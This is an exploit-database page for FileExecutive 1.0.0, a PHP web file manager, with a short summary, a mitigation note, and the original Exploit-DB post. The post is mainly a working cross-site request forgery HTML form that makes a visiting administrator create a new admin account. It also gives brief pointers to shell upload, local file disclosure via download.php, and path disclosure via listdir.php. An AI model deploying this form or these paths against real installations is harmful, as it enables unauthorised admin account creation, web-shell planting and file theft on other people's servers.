header-logo
Suggest Exploit
vendor:
FileExecutive
by:
MvM
8,8
CVSS
HIGH
Add/Edit Admin CSRF
352
CWE
Product Name: FileExecutive
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: No
Related CWE: N/A
CPE: a:vi_rus_man:fileexecutive
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

FileExecutive Multiple Vulnerabilities

FileExecutive is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that, when visited by an authenticated user, can add an admin user to the application. The malicious page contains a form that submits to the add_user.php script, which is responsible for adding new users. The form contains fields for username, password, name, root directory, max upload size, group, email, active, and admin. The form is pre-filled with values that will add an admin user.

Mitigation:

To mitigate CSRF attacks, the application should implement a CSRF token that is checked on all requests that modify the application state.
Source

Exploit-DB raw data:

==============================================================================
        [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
        [»] FileExecutive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ FileExecutive v1.0.0 ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ FileExecutive is a web-based file manager written in PHP. ]
    [»] Download:           [ http://sourceforge.net/projects/fileexecutive/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploits ]===

Add/Edit Admin CSRF:

<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td>		<td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

Shell Upload:

    [»] By Go To The End Of Page & Browse Your Shell 2 upload it   <-=- Remote File Upload Vulnerability

Local File Disclosure:

    [»] http://localhost/[path]/download.php?file=./LFD            <-=- Local File Disclosure Vulnerability

Full Path Disclosure:

    [»] http://localhost/[path]/listdir.php?dir=./FPD              <-=- Full Path Disclosure Vulnerability

Author: ViRuSMaN <-

###########################################################################

Navigation

Suggest Exploit

Services By CQR